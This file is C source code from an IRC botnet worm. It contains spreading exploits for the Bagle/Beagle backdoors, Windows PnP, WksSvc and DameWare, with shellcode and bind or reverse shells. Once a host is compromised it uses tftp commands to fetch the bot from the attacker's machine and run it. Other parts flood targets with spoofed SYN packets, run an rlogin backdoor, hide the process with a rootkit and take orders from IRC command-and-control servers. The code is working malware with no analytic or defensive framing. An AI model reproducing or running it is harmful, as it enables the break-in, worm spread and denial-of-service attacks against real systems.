BOOL Beagle(EXINFO exinfo)
{
char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
BOOL success = FALSE;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0)
return FALSE;
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
GetModuleFileName(0, botfile, sizeof(botfile));
_splitpath(botfile, NULL, NULL, fname, ext);
_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
if(fsend(sSock, buffer, sizeof(buffer), 0))
success = TRUE;
}
}
}
}
fclosesocket(sSock);
fWSACleanup();
if (success) {
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
}
return (success);
}
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
SOCKADDR_IN addr;
int len;
int sockfd;
unsigned short smblen;
char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
IRC* irc=(IRC*)conn;
BOOL success=FALSE;
char* thisTarget;
int pnpbindsize=405;
int TargetOS, Target;
char* tOS="";
WSADATA wsa;
fWSAStartup(MAKEWORD(2,0), &wsa);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;
thisTarget = exinfo.ip;
TargetOS=FpHost(thisTarget,FP_NP);
if (TargetOS==OS_UNKNOWN)
TargetOS=FpHost(thisTarget,FP_SMB);
if (TargetOS == OS_WINNT){
Target=OS_WINNT;
success=FALSE;
}else if (TargetOS==OS_WINXP){
Target=OS_WINXP;
success=FALSE;
}else if (TargetOS==OS_WIN2K){
Target=OS_WIN2K;
success=TRUE;
}else{
success=FALSE;
}
ZeroMemory(&addr,sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = finet_addr(thisTarget);
addr.sin_port = fhtons((unsigned short)exinfo.port);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if (len <= 10) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
convert_name((char *)ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// Start prepare header -- dETOX mod --
memcpy(RPC_call + 260, Offsets[OffNum], 4);
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
memcpy(ptr,bindshell,pnpbindsize-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
frecv(sockfd, recvbuf, 4096, 0);
if (!exinfo.silent && exinfo.verbose){
switch(Target){
case 1:
tOS="WINNT";
break;
case 2:
tOS="WIN2K";
break;
case 3:
tOS="WINXP";
break;
default:
tOS="UNKNOWN/2K3/LINUX";
break;
}
irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
}
// if(success){
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// }
return TRUE;
}
DWORD WINAPI Bthd(LPVOID param)
{
for (int m=0;m<6;m++)
{
if(!(xetum=CreateMutex(NULL, FALSE, xetumhandle)))
Sleep(5000);
else
break;
}
if (WaitForSingleObject(CreateMutex(NULL, TRUE, xetumhandle), 30000) == WAIT_TIMEOUT)
ExitProcess(0);
addthread(MAIN_THREAD,str_main_thread,main_title);
srand(GetTickCount());
dwstarted=GetTickCount();
WSADATA wsadata;
if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
ExitProcess(-2);
int i=0;
DWORD id=0;
char *ip;
char hostname[256];
struct hostent *h;
fgethostname(hostname, 256);
h = fgethostbyname(hostname);
ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
strncpy(inip,ip,sizeof(inip));
curserver=0;
HookProtocol(&mainirc);
while (mainirc.should_connect()) {
if (!mainirc.is_connected())
{
#ifdef _DEBUG
printf("Trying to connect to: %s:%i\r\n",sinfo[curserver].host,sinfo[curserver].port);
#endif
#ifndef NO_FLUSHDNS
FlushDNSCache();
#endif
mainirc.start(sinfo[curserver].host,sinfo[curserver].port,
mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),sinfo[curserver].pass);
mainirc.message_loop();
}
else
mainirc.message_loop();
Sleep(SFLOOD_DELAY);
if (curserver==(srvsz-1))
curserver=0;
else
curserver++;
}
// cleanup;
//killthreadall();
fWSACleanup();
ReleaseMutex(xetum);
ExitThread(0);
return TRUE;
}
DWORD WINAPI RlogindThread(LPVOID param)
{
RLOGIND rlogind = *((RLOGIND *)param);
RLOGIND *rloginds = (RLOGIND *)param;
rloginds->gotinfo = TRUE;
char sendbuf[IRCLINE];
int csin_len, Err;
unsigned long mode = 1;
WSADATA WSAData;
SECURITY_ATTRIBUTES SecurityAttributes;
DWORD id;
if ((Err = fWSAStartup(MAKEWORD(2,2), &WSAData)) != 0) {
addlogv("[RLOGIND]: Error: WSAStartup(): <%d>.", Err);
clearthread(rlogind.threadnum);
ExitThread(1);
}
if (!SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler, TRUE)) {
addlogv("[RLOGIND]: Failed to install control-C handler, error: <%d>.", GetLastError());
fWSACleanup();
clearthread(rlogind.threadnum);
ExitThread(1);
}
SOCKET ssock, csock;
SOCKADDR_IN csin, ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(rlogind.port);
ssin.sin_addr.s_addr = INADDR_ANY;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
threads[rlogind.threadnum].sock = ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) {
if (flisten(ssock, SOMAXCONN) == 0) {
SecurityAttributes.nLength = sizeof(SecurityAttributes);
SecurityAttributes.lpSecurityDescriptor = NULL;
SecurityAttributes.bInheritHandle = FALSE;
addlog("[RLOGIND]: Ready and waiting for incoming connections.");
BOOL flag = TRUE;
while (1) {
csin_len = sizeof(csin);
if ((csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET)
break;
if (fsetsockopt(csock, SOL_SOCKET, SO_KEEPALIVE,(char *)&flag,flag) != SOCKET_ERROR) {
rlogind.gotinfo = FALSE;
sprintf(sendbuf,"[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), fntohs(csin.sin_port), rlogind.threadnum);
addlog(sendbuf);
rlogind.cthreadnum = addthread(sendbuf,RLOGIN_THREAD,csock);
threads[rlogind.cthreadnum].parent = rlogind.threadnum;
if (threads[rlogind.cthreadnum].tHandle = CreateThread(&SecurityAttributes,0,&RlogindClientThread,(LPVOID)&rlogind,0,&id)) {
while (rlogind.gotinfo == FALSE)
Sleep(50);
} else {
addlogv("[RLOGIND]: Failed to start client thread, error: <%d>.", GetLastError());
break;
}
}
}
}
}
}
sprintf(sendbuf, "[RLOGIND]: Error: server failed, returned: <%d>.", fWSAGetLastError());
if (!rlogind.silent) irc_privmsg(rlogind.sock, rlogind.chan, sendbuf, rlogind.notice);
addlog(sendbuf);
fclosesocket(csock);
fclosesocket(ssock);
fWSACleanup();
clearthread(rlogind.threadnum);
ExitThread(0);
}
BOOL WksSvc(EXINFO exinfo)
{
char sendbuf[IRCLINE];
char WksFile[MAX_PATH];
char cmd[500]; // Feel the wrath of my spontaneous comments
SOCKET sock;
char overwrite[2045] = "";
char exp_buf[2045+4+16+501];
char ip[30];
LPWSTR ipl[60];
DWORD jmpesp = 0x7518A747;
//LPWSTR unicodesp0[(2045+4+16+501)*2];
char unicode[(2045+4+16+501)*2];
int z = 0;
int x = 0;
int len = 0;
HINSTANCE hinstLib;
MYPROC ProcAddr;
BOOL fRunTimeLinkSuccess = FALSE;
WSADATA wsaData;
if (fWSAStartup(MAKEWORD(2, 0), &wsaData)) return 0;
GetModuleFileName(0, WksFile, sizeof(WksFile)); // Will contain path + filename? :x
// Lets build our request... Seeing as our shellcode binds us a shell, tftp is easy ;O
_snprintf(cmd,sizeof(cmd),
"tftp -i %s get %s"
"&start %s&wank\n",
GetIP(exinfo.sock),WksFile,WksFile);
_snprintf(ip, 24, "\\\\%s", exinfo.ip);
memset(overwrite, 0x41, 2000);
memset(overwrite+2000, 0x90, 44);
memcpy(exp_buf, overwrite, 2044);
memcpy(exp_buf+2044, &jmpesp, 4);
memset(exp_buf+2048, 0x90, 16);
memcpy(exp_buf+2064, sc, sizeof(sc));
// Small problem, SP0 or SP1? (Trying an incorrect one will probably crash the target machine, so its one or the other :P)
// SP1 for now, seems more popular.
memset(unicode, 0x00, sizeof(unicode));
for (x = 0, z = 0; z <= sizeof(unicode); x++, z+=2) {
unicode[z] = exp_buf[x];
}
/* - SP0 Code
len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicodesp0,sizeof(unicodesp0));
*/
hinstLib = LoadLibrary("netapi32.dll"); // FIX ME: This is already loaded @ functions.h/loaddlls.cpp?
MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);
ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName");
if (NULL != ProcAddr) {
fRunTimeLinkSuccess = TRUE;
(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0); // Run NAACN with our nasty settings :O
/*
(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicodesp0,NULL,NULL,0);
*/
} else {
return FALSE;
}
// Exploit sent, lets check if they left us a shell :)
Sleep(1000); // Testing only (May not be needed)
// Lame old Thunderstorm socket checker.
if((sock=WksSocket(3, 4444, exinfo.ip)) != -1) {
// Send our TFTP/FTP request
fsend(sock, cmd, strlen(cmd), 0);
unsigned int nReadBytes;
char received[1000];
while(1)
{
// Take a Break.
Sleep(1000);
unsigned long ul[2];
ul[0]=1;
ul[1]=sock;
struct timeval timeout;
timeout.tv_sec=1;
timeout.tv_usec=0;
int l=fselect(0, (fd_set *)&ul, 0,0, &timeout);
if ((l==1))
{
if((nReadBytes = frecv(sock, received, sizeof(received), 0))!= SOCKET_ERROR && nReadBytes!=0)
{
received[nReadBytes]=0x00;
if(strstr(received, "not recognized"))
break;
}
}
}
} else {
return FALSE; // (The shell either hasn't arrived or has crashed, so we quit.)
}
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
for (int i=0; i < 6; i++) {
if (searchlog(sendbuf)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
Sleep(5000);
}
fclosesocket(sock);
return TRUE;
}
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0)
return FALSE;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=fhtons((unsigned short)TargetPort);
addr_in.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons((unsigned short)TargetPort);
tcpHeader.sport=fhtons((unsigned short)rand()%1025);
tcpHeader.seq=fhtonl(0x12345678);
/* A SYN attack simply smash its target up with TCP SYN packets.
Each SYN packet needs a SYN-ACK response and forces the server to wait for
the good ACK in reply. Of course, we just never gives the ACK, since we use a
bad IP address (spoof) there's no chance of an ACK returning.
This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs.
When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs,
and that's the end of that server until the attack is cleared up.*/
if (strcmp(Type,"ddos.syn") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strcmp(Type,"ddos.ack") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strcmp(Type,"ddos.random") == 0) {
tcpHeader.ack_seq=rand()%3;
if (rand()%2 == 0)
tcpHeader.flags=SYN;
else
tcpHeader.flags=ACK;
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while(TRUE) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len)
{
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0)
return FALSE;
SOCKET sock;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(TargetPort);
ssin.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons(TargetPort);
tcpHeader.ack_seq=0;
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.flags=2;
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while (1) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}
DWORD WINAPI BotThread(LPVOID param)
{
for (int m=0;m<6;m++)
{
if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle)))
Sleep(5000);
else
break;
}
// if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT)
// ExitProcess(0);
addthread(MAIN_THREAD,str_main_thread,main_title);
#ifndef _DEBUG
#ifndef NO_MELT
char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name);
if (melt)
{
SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL);
int tries=0;
while (FileExists(melt) && tries<3)
{
DeleteFile(melt);
tries++;
Sleep(2000);
}
RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name);
}
#endif // NO_MELT
#endif // _DEBUG
srand(GetTickCount());
dwstarted=GetTickCount();
#ifndef NO_VERSION_REPLY
curversion=rand()%(versionsize);
#ifdef _DEBUG
printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]);
#endif
#endif
WSADATA wsadata;
if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
ExitProcess(-2);
#ifndef _DEBUG
#ifndef NO_FCONNECT
char readbuf[1024];
HINTERNET httpopen, openurl;
DWORD read;
httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL);
if (!openurl)
{
fInternetCloseHandle(httpopen);
fInternetCloseHandle(openurl);
}
fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read);
fInternetCloseHandle(httpopen);
fInternetCloseHandle(openurl);
#endif // NO_FCONNECT
#endif // _DEBUG
#ifndef NO_INSTALLED_TIME
if (!noadvapi32)
GetInstalledTime();
else
sprintf(installedt,"Error");
#endif // NO_INSTALLED_TIME
int i=0;
DWORD id=0;
#ifndef NO_RECORD_UPTIME
i=addthread(RUPTIME_THREAD,str_rup_thread,main_title);
threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id);
#endif // NO_RECORD_UPTIME
#ifndef NO_AUTO_SECURE
#ifndef NO_SECURE
NTHREAD secure;
secure.bdata2=TRUE;//loop
i=addthread(SECURE_THREAD,str_asecure_thread,sec_title);
threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id);
#endif
#endif // NO_AUTO_SECURE
#ifndef NO_RDRIV
#ifndef _DEBUG
rkenabled=InitRK();//initialize fu
if (rkenabled)
HideMe();//hide the process
#endif // _DEBUG
#endif // NO_RDRIV
#ifndef _DEBUG // maybe this will give the shutdown handler time to work
RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000");
#endif
//get internal ip
char *ip;
char hostname[256];
struct hostent *h;
fgethostname(hostname, 256);
h = fgethostbyname(hostname);
ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
strncpy(inip,ip,sizeof(inip));
curserver=0;
HookProtocol(&mainirc);
while (mainirc.should_connect()) {
if (!mainirc.is_connected())
{
#ifdef _DEBUG
printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port);
#endif
#ifndef NO_FLUSHDNS
FlushDNSCache();
#endif
mainirc.start(servers[curserver].host,servers[curserver].port,
mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass);
mainirc.message_loop();
}
else
mainirc.message_loop();
Sleep(SFLOOD_DELAY);
if (curserver==(serversize-1))
curserver=0;
else
curserver++;
}
// cleanup;
killthreadall();
fWSACleanup();
ReleaseMutex(mutex);
ExitThread(0);
}
BOOL DameWare(EXINFO exinfo)
{
char buffer[IRCLINE], szRecvBuf[5096], szReqBuf[5096];
int os_sp=0, os_ver=check_os((char*)exinfo.ip,exinfo.port,&os_sp);
BOOL bRet = FALSE;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0)
return FALSE;
// Build a buffer with the shellcode
memcpy(szReqBuf,"\x10\x27",2);
memset(szReqBuf+0xc4+9,0x90,500);
*(unsigned long*)&szReqBuf[516] = target_os[os_ver].sp[os_sp].eip;
memcpy(szReqBuf+520, phatty_rshell, strlen(phatty_rshell) );
memcpy(szReqBuf+1042, "neTmaNiac", 9 );
memcpy(szReqBuf+0x5b4+0x24, "netmaniac was here", 18 );
memcpy(szReqBuf+0x5b4+0x128, "12/12/04 13:13:13", 17 );
memcpy(szReqBuf+0x5b4+0x538, "netninjaz_place", 15 );
memcpy(szReqBuf+0x5b4+0x5b4+0x88, "131.131.131.131", 16 );
memcpy(szReqBuf+0x5b4+0x5b4+0x394, "3.72.0.0", strlen("3.72.0.0") );
// Connect to the server
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
_snprintf(buffer, sizeof(buffer), "[%s]: Connected to %s\r\n", exploit[exinfo.exploit].name, GetIP(sSock));
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(sSock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) > 0) {
memset(szRecvBuf, 0, sizeof(szRecvBuf));
if (frecv(sSock,(char *)szRecvBuf,sizeof(szRecvBuf),0) > 0) {
memset(szRecvBuf,0,sizeof(szRecvBuf));
Sleep(500);
if (fsend(sSock,(char *)send_buff,strlen((char *)send_buff),0) > 0) {
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
Sleep(2000);
if (frecv(sSock,(char *)szRecvBuf, sizeof(szRecvBuf),0) > 0) {
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
Sleep(500);
if(fsend(sSock,(char *)szReqBuf,strlen((char *)szReqBuf),0) > 0) {
Sleep(10000);
fclosesocket(sSock);
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)1981);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
char cmd_buff[400];
_snprintf(cmd_buff,sizeof(cmd_buff),
"tftp -i %s get %s\n"
"%s\n",
GetIP(exinfo.sock),filename, filename);
if(frecv(exinfo.sock, szRecvBuf, sizeof(szRecvBuf), 0) > 0) {
Sleep(500);
if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) {
fclosesocket(sSock);
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
bRet = TRUE;
}
}
}
}
}
}
}
}
}
fclosesocket(sSock);
}
return (bRet);
}
